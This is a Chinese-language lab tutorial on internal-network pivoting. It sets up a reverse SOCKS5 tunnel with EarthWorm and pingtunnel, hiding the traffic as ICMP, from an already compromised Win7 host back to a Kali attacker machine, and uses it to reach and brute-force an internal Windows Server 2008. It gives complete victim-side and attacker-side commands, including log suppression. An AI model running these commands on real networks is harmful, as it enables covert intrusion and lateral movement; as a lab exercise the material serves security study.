0x00 实验环境
攻击机:win(192.168.43.131)+kali(192.168.43.217)
受害机:win7(IP:192.168.43.50、192.168.59.133;双网卡,一个公网一个内网)、winserver2008(IP:192.168.59.18;仅主机:一个内网)
0x01 实验效果
在已经拿到公网win7服务器的前提下,通过ew与pingtunnel搭建能通往winserver2008的隧道,获取winserver2008的服务器权限
0x02 实验准备
工具:ew、pingtunnel、proxifer(代理工具)
https://github.com/idlefire/ew
https://github.com/esrrhs/pingtunnel
proxifer官网自行下载
工具介绍:
ew
EarthWorm是一款用于开启 SOCKS v5 代理服务的工具,基于标准 C 开发,可提供多平台间的转接通讯,用于复杂网络环境下的数据转发。
pingtunnel
pingtunnel 是把 tcp/udp/sock5 流量伪装成 icmp 流量进行转发的工具
0x03 打通隧道
1、kali执行:
./ew_for_linux64 -s rcsocks -l 10080 -e 8898
10080作为连接隧道的端口,8898作为隧道的通道,可以想象为,通向内网主机的路口为10080,走的这条路为8898。8898上所有的人(流量)都会通往10080这个路口。
2、kali执行:
./pingtunnel -type server
意思是将ew启动的sock5协议转换为icmp协议来隐藏传输
3、肉鸡win7执行:
pingtunnel.exe -type client -l 127.0.0.1:9999 -s 192.168.43.217 -t 192.168.43.217:8898 -sock5 -1 -noprint 1 -nolog 1
意思是8898这条路上的sock5流量信息隐藏为icmp类型的数据在本肉鸡的9999端口进行转发。
4、肉鸡win7执行:
ew.exe -s rssocks -d 127.0.0.1 -e 9999
在本肉鸡9999端口开启转发流量
出现上述错误时,是因为你在运行pingtunnel时没有以管理员的身份运行cmd
如下就可以显示成功了:
5、kali上出现OK字样时表示代理搭建完成:
6、使用proxifer来访问内网:
此时再次访问win2008那台仅仅为内网的主机:
7、kali通过win7搭建了隧道,实现了内网横向的证明:ping winserver2008是不通的,但是挂好代理可以进行59.18的数据库弱口令爆破!